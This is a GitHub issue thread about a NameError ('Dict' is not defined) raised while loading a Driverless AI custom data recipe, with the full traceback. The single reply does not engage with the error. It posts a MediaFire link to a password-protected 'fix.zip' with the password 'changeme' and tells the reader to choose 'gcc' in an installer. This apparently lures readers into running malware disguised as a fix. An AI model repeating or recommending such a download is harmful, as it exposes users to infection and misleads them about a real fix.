### ISSUE TITLE
name 'Dict' is not defined when trying to import data/data_template.py

### ISSUE THREAD

**Issue by rasika** [h2oai/driverlessai-recipes#211]
```
Server done loading custom recipes: key: 3c700122-648a-11ef-990c-c2f665a3ee5d name: simple_recipe fpath: /dai-data/uploads/simple_recipe.py url: None
/dai-data/test/contrib/models/simple_recipe_bffc8640_content.py hit exception: Traceback (most recent call last):
  File "h2oaicore/utils.py", line 1517, in h2oaicore.utils.ContribLoader._load_custom_blueprints_file
  File "h2oaicore/utils.py", line 1717, in h2oaicore.utils.ContribLoader._load_module
  File "h2oaicore/utils.py", line 1677, in h2oaicore.utils.ContribLoader._file_to_module
  File "h2oaicore/utils.py", line 1660, in h2oaicore.utils.ContribLoader._file_to_module
  File "&lt;frozen importlib._bootstrap_external&gt;", line 843, in exec_module
  File "&lt;frozen importlib._bootstrap&gt;", line 219, in _call_with_frames_removed
  File "/dai-data/test/contrib/models/simple_recipe_bffc8640_content.py", line 11, in &lt;module&gt;
  File "/dai-data/test/contrib/models/simple_recipe_bffc8640_content.py", line 27, in CustomData
NameError: name 'Dict' is not defined
```

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
